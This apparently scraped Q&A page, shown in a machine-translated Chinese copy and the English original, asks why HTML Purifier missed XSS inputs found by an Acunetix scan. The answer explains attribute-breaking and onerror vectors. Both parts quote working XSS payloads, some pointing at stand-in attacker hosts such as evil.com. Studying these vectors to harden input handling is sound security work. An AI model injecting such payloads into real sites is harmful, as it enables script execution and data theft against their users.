更新时间:2023-01-23 21:07:35
从简短的外观来看,所有HTML净化器似乎都在这样做我给的是HTML编码的某些字符,例如<
,>
等。但是,还有其他方法可以在不使用普通HTML字符的情况下调用JS:
javascript:prompt(1)//在图像标记中
src = http://evil.com/xss.html //在iFrame代码中
请在下方查看评论(@pinkgothic)。
< img>
标记,将 src
指向某个不存在的文件,转会引发错误。然后可以通过 onerror
处理程序来运行一些JavaScript代码。以以下示例为例: < img src = x onerror = alert(document.domain)>
它的入口点通常伴随着过早关闭输入上的另一个标记。例如(为清楚起见,对网址进行了解码):
GET /products.php?type=\"><img src = x onerror = prompt(1)> HTTP / 1.1
但是,通过HTML转义元数据可以轻松地将其删除-字符(即<
,>
)。
< img src = $ USER_DEFINED>
一个正常的例子是:
< img src = http:/ /example.com/img.jpg\">
但是,插入上述有效负载后,我们切断 src
属性指向一个不存在的文件并注入 onerror
处理程序:
< img src = 1 onerror = alert(document.domain)>
此e xecutes与上述相同的有效载荷。
这已被大量记录并进行了多次测试的地方,所以我不会详细介绍。但是,以下两篇文章非常适合该主题,并且可以满足您的所有需求:
I'm testing one of my web application using Acunetix. To protect this project against XSS attacks, I used HTML Purifier. This library is recommended by most of PHP developers for this purpose, but my scan results shows HTML Purifier can not protect us from XSS attacks completely. The scanner found two ways of attack by sending different harmful inputs:
1<img sRc='http://attacker-9437/log.php?
(See HTML Purifier result here)1"onmouseover=vVF3(9185)"
(See HTML Purifier result here) As you can see results, HTML Purifier could not detect such attacks. I don't know if is there any specific option on HTML Purifier to solve such problems, or is it really unable to detect these methods of XSS attacks.
Do you have any idea? Or any other solution?
All the HTML purifier seems to be doing, from the brief look that I gave, was HTML encode certain characters such as <
, >
and so on. However there are other means of invoking JS without using the normal HTML characters:
javascript:prompt(1) // In image tags
src="http://evil.com/xss.html" // In iFrame tags
Please review comments (by @pinkgothic) below.
<img>
tag, point the src
to some non-existent file which in turn raises an error. That can then be handled by the onerror
handler to run some JavaScript code. Take the following example:<img src=x onerror=alert(document.domain)>
The entrypoint for this it generally accompanied by prematurely closing another tag on an input. For example (URL decoded for clarity):
GET /products.php?type="><img src=x onerror=prompt(1)> HTTP/1.1
This however, is easily mititgated by HTML escaping meta-character (i.e. <
, >
).
<img src="$USER_DEFINED">
A normal example would be:
<img src="http://example.com/img.jpg">
However, inserting the above payload, we cut off the src
attribute which points to a non-existent file and inject an onerror
handler:
<img src="1"onerror=alert(document.domain)">
This executes the same payload mentioned above.
This is heavily documented and tested in multiple places, so I won't go into detail. However, the following two articles are great on the subject and will cover all your needs: